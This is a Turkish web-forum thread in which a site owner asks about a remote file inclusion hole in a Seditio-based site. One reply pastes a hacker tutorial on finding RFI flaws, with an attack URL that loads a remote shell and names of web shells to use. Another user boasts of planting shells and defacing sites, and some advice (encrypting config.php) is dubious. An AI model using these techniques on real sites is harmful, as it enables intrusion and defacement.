Sitemde açık varr
|
#4605 |
|
world
User is:
Posts: 61
Meslek: sanane
Age: 59
|
Benim sitemde rfi açığı var ama açığın nasıl olduğunu bilmiyom o yüzden kapatamıyom yardıım
|
Sitemde açık varr
|
#4606 |
|
ers0be
User is:
Posts: 123
Meslek: PC
Age: 39
|
standart rfi açıkları bulma yöntemleri
-------------------------------------------------------------------------------- RFI açılımı olarak Remote File Inclusion'dur yani türkçe karşılığı olarak Uzaktan Dosya Enjekte etmektir ama biz buna hacking aleminde daha çok Uzaktan Kod Çağırma diyoruz.. Mantığına gelince de; PHP Coderların sayfaları kodlarken kullandıkları string (yumak) ve variable (değişken) lerin tam olarak kontrol edilmemesinden dolayı her zaman war olan ve war olmaya devam edecek olan bir güvenlik açığıdır. Neden böyle söyleyebiliyorum? Çünkü 2-3 gün boyunca bir an bile durmaksızın kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolayı kodlarda açık werecektir. Neyse lafı fazla dolandırmadan örnek vereyim.. Hepimizin bildiği ve bu sitede de kullanılan vBulletin script'ini ele alalım. ( artı parantez vBulletin'in popüler versiyonları olan 3.6.x serisinde bugune kadar rfi açığı bulunduğunu duymadım bilmiyorum. Sadece örnek olsun diye bu scripti ele aldım. ) Nası bulunur? Kullanımı nası olur? Açık tespit etmek için öncelikle PHP den orta seviye de anlamamız gerekiyor. şimdi adım adım açık bulmayı anlatayım.. Öncelikle açık bulmak istediğiniz scriptin kaynak kodlarını bilgisayarınıza download ediyorsunuz. Bu örnekte biz vBulletin scriptini indiriyoruz. ve araştırmaya başlıyoruz. Mesela " index.php " dosyasını araştırmak istiyoruz.. O zaman index.php dosyasını bir text editörü yardımı ile açıyoruz örnğin Not Defteri.. ve hemen kodları incelemeye başlıyoruz.. Araştırma kriterlerimiz; include include_once require require_once fonksiyonlarıdır. Hatta bir iyilik daha yapayım ve bu fonksiyonların PHP ne işe yaradığını anlatayım.. Daha etkili olur.. Şimdi bildiğiniz üzere web-sitelerinde dolaştığınız her sayfa tek tek sıfırdan yapılır.. Özellikle HTML site kodlandığı zaman her sayfa için aynı kodları tekrar tekrar girmek zorunda kalırsınız ama PHP bu yönüyle ve diğer yönleriylede HTML den oldukça üstündür ve include ve require fonksiyonları sayesinde sabit bir sayfayı farklı amaçlarda kullanabiliriz. yani anlatmak istediğim şey mesela bir inşaat şirketinin sitesini PHP olarak kodluyosunuz ve header dediğimiz yukarıda yani banner ve çevresini kapsayan kısım anasayfadan tutunda kontak sayfasına kadar heryerde aynı değişen tek şey sadece ortada bulunan yazıların bulundugu yer.. Şimdi anasayfa ve kontak sayfası için tek tek kodlama yapmaktansa ust.php diye bir kere kodlarız ve anasayfa.php ye aşağıdaki kodu ekleriz; <? include_once ($orchid, "ust.php") ?> daha sonra ayasayfa.php dosyasını çalıştırdığımız zaman ust.php nin anasayfa ile bütünleşerek çıktığını görürsünüz ve bu kodu her sayfanız için yazarsanız otomatikmen kolay bi şekilde ust.php dosyasını istediğiniz yere ENJEKTE edebilirsiniz.. " Dikkat : ENJEKTE " Şimdi include ve require fonksiyonlarının mantığını anladığınızı varsa***** kaldığımız yere geri dönelim.. index.php dosyasını açtınız ve include, include_once, vb. gibi bir kod gördünüz.. Az önceki örneğe devam edelim; <? include_once ($orchid, "ust.php") ?> Yukarıda gördüğünüz PHP kodu bulundugu sayfaya aynı dizinde bulundugu ust.php dosyasını çağırmaktadır. (Dikkat : ÇAĞIRMAKTADIR ) Şimdi biz ne yapabiliriz bu koda? Hemen düşünürüzki acaba coder " DOSYA ÇAĞIRMA " işlevini sınırlandırmışmıdır yani sadece bulunduğu dizinden mi dosya kabul ediyor?? Hemen bi deneme yaparız.; index.php dosyasındaydık ve " orchid " parametresini kullanarak ust.php dosyasını çağıran yukarıda ki kodda açık arıyoduk, deneme - yanılma yapalım.. kurbansite.com/index.php?orchid=http://SHELL? Ve girdik.. Şimdi az önce UST.PHP nin bulundugu yerde bizim shellimiz war.. Böylece ilk adımı attık ve açığımızı bulduk bundan sonra artık r57, c99, fatalshell, ekin0xshell ne kullanırsanız kullanıp bulduğunuz açığı sömürün (exploit = Sömürmek) alıntı... |
megadonanim.com Kalamazsın bu dünyada bakire, en azından hayat koyar bir kere.. |
Sitemde açık varr
|
#4609 |
|
world
User is:
Posts: 61
Meslek: sanane
Age: 59
|
birader pek anlamadım be
kaan gelsin bi baksın yaa |
Sitemde açık varr
|
#4613 |
|
Kaan
User is:
Posts: 2772
Meslek: Serbest Meslek
Age: 41
|
Açık oldugunu nereden anladın.? neler yapabiliyorlar açıkla daha aydınlatıcı anlatırsan ona göre gerekli düzenlemeyi yaparız.
HP Coderların sayfaları kodlarken kullandıkları string (yumak) ve variable (değişken) lerin tam olarak kontrol edilmemesinden dolayı her zaman war olan ve war olmaya devam edecek olan bir güvenlik açığıdır. Neden böyle söyleyebiliyorum? Çünkü 2-3 gün boyunca bir an bile durmaksızın kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolayı kodlarda açık werecektir. Bende bu konuyu incelerken fark ettim ki yeni hazırladıgım sistemde çok büyük bir açık bırakmışım son anda fark ettim ve gerekli uygulamayı yaptım yoksa hepimiz yanmıştık fark etselerdi |
Emlak, Oto Galeri, Rent A Car, Şiir, Edebiyat Script Siparişlerinizi Verebilirsiniz. Detaylar İçin: kaan@ntka.org Seditio 170 İndir Capte Müzik İndir Seditio Toolbar İndir |
Sitemde açık varr
|
#4614 |
|
JoviaL
User is:
Posts: 41
Meslek: TesısaTcı
Age: 33
|
world free host larda shell calısmız benım bıldıgım : )
|
Sitemde açık varr
|
#4615 |
|
rootinq
User is:
Posts: 68
Meslek: İktisat
Age: 37
|
rfi olmasi imkansiz seditio da ancak sonradan eklenen bir pluginde varsa vardır ;)
|
Sitemde açık varr
|
#4616 |
|
world
User is:
Posts: 61
Meslek: sanane
Age: 59
|
Madrox rahatca shell atıyo
|
Sitemde açık varr
|
#4618 |
|
Aragorn-pc
User is:
Posts: 163
Meslek: Kanserle Savaşıyor..
Age: 38
|
Alıntı Niye imkansız olsun ki ? Daha önce bir çok rfi açığı ile ruslar terör estirdi Kaan Haklı, Herşey Kontrolsüzlükten meydana geliyor, Bunun için ya kurduğun sistemi test edeceksin, yada Allah'a emanet edip bırakacaksın :P )) |
Reklama Gerek Yok Eskiler Tanır, Yeniler Örnek ALır ! Alayına İSYAN ! Az Bir Zamanda Dev Projeler ile Yayın Hayatında ! Sabrediyorum.. |
Sitemde açık varr
|
#4622 |
|
rootinq
User is:
Posts: 68
Meslek: İktisat
Age: 37
|
bana bitane rfi acigi olan sayfayi gostersene ?. birseyi soylerken iskembeyi kübradan sallamıyorum tüm include dosyalarini bizzat inceledim. rfi olmasi imkansiz ;) ama onun disindaki bug'lara birsey diyemecegim. ayrica oliver bu konuda cok deneyimli biri. Ayrica senin bahsettin ruslarin search acigiydi yada sifreyi 123456 olarak degistirebildikleri acikti.
|
Sitemde açık varr
|
#4623 |
|
By_Reco
User is:
Posts: 58
Meslek: Öğrenci
Age: 34
|
aga sorununu anladım ben sorunu çözmek için config.php yi şifrele
|
Hedefim Herkezin Hedefi Olmaktır... iletişim için: recoo58@hotmail.com ve reco-turk-58@hotmail.com http://www.underforum.tk/index.php |
Sitemde açık varr
|
#4628 |
|
Kaan
User is:
Posts: 2772
Meslek: Serbest Meslek
Age: 41
|
Bende test ettim suanda seditioda bir açık görünmüyor.
Extra eklenen kodlardan veya başka bir eklentiden kaynaklanabilir. Başka sitelerden indirdiğiniz eklentileri vb.özellikleri sisteminize entegre etmeyiniz. Bu site sizin için var ve sizin isteklerinize göre gerekli eklentileri ve modifiyeleri veriyoruz zaten bu siteden indirdiğiniz eklentide veya kodlarda açık bulunursa derhal bildiriniz. Her zaman söylemişimdir ve söyleme devam ediyorum. En büyük açık site sahibidir. Yaptıgı hatalardan dolayı siteleri bu tür saldırılara maruz kalmaktadır. |
Emlak, Oto Galeri, Rent A Car, Şiir, Edebiyat Script Siparişlerinizi Verebilirsiniz. Detaylar İçin: kaan@ntka.org Seditio 170 İndir Capte Müzik İndir Seditio Toolbar İndir |
Sitemde açık varr
|
#4634 |
|
world
User is:
Posts: 61
Meslek: sanane
Age: 59
|
oke ozaman config.php yi nası şifreleniyo onu gösterirmisin
|
Sitemde açık varr
|
#4638 |
|
JoviaL
User is:
Posts: 41
Meslek: TesısaTcı
Age: 33
|
world kullandıgın sıstem ın surumu nedır ? 130 dan eski ise 130 a gec 130 da cıddı bı acık yok ugrasma bosu bosuna
|
Sitemde açık varr
|
#4639 |
|
world
User is:
Posts: 61
Meslek: sanane
Age: 59
|
gerek yok artık 151 kullanıcam
|
Sitemde açık varr
|
#4645 |
|
rootinq
User is:
Posts: 68
Meslek: İktisat
Age: 37
|
ben 121 kulaniyorum . ama tum degiskenleri ve eklentileri editlenmis. size tavsiyem bodozlama bi scripti kurmayin madem bu islerle ugrasiyorsunuz biraz terletin kendinizide kendine gore duzenleyn scrpti
|
Sitemde açık varr
|
#4648 |
|
Kaan
User is:
Posts: 2772
Meslek: Serbest Meslek
Age: 41
|
Alıntı Scripti değiştirmen senin zararına gerekli güncellemeleri yapmakda zorluk çekersin. Seditioda açık yok şuan için belki vardır bizim bilmediğimiz ama uzun zamandır önemli bir açığa rastlanmadı. Madem o işlerle uğrasıyorsunuz indirin test edin Scripti işde burada açık var diye bagırmanın bir anlamı yok Scripti defalarca test edin bir açık bulursanız söyleyin herkes bilsin. |
Emlak, Oto Galeri, Rent A Car, Şiir, Edebiyat Script Siparişlerinizi Verebilirsiniz. Detaylar İçin: kaan@ntka.org Seditio 170 İndir Capte Müzik İndir Seditio Toolbar İndir |
Sitemde açık varr
|
#4649 |
|
By_Reco
User is:
Posts: 58
Meslek: Öğrenci
Age: 34
|
aga seditio 151 kur açıklar gider fakat hayla aynı system de kalmak istiyorsan config.php şifrelemenin yolunu bul sitene shell soksa bile hackliyemez beni dinle sen
|
Hedefim Herkezin Hedefi Olmaktır... iletişim için: recoo58@hotmail.com ve reco-turk-58@hotmail.com http://www.underforum.tk/index.php |
Sitemde açık varr
|
#4665 |
|
vanli
User is:
Posts:
Meslek:
Age:
|
config.php yi şifrelicek ve shellde soksa hacklenmicek ilginç reco
ben şahsen bi sisteme shell soktugumda eger yazma izinleri yoksa (ki her türlü serverı geçerim **** ) Serverı Geçmeye Çalışırım Ve Geçer İndex.php ye indexsi **** yani shell sokupta aman şunun config.php sini alıyımda sitede admin üyeligine girimde meta atayım demem. Bu mesaj Kaan tarafından 2010-12-27 22:59 GMT, 4860 Gün önce düzenlendi. |
Sitemde açık varr
|
#4666 |
|
Kaan
User is:
Posts: 2772
Meslek: Serbest Meslek
Age: 41
|
Konuyu başka yerlere çektiğiniz için konu kapanmıştır bu tür konuların yeri burası değil olmayacaktırda bu tür diyaloglara girenler siteden uzaklaştırılıcaklardır. |
Emlak, Oto Galeri, Rent A Car, Şiir, Edebiyat Script Siparişlerinizi Verebilirsiniz. Detaylar İçin: kaan@ntka.org Seditio 170 İndir Capte Müzik İndir Seditio Toolbar İndir |
Bu konu kilitlidir. Mesaj yazamazsınız.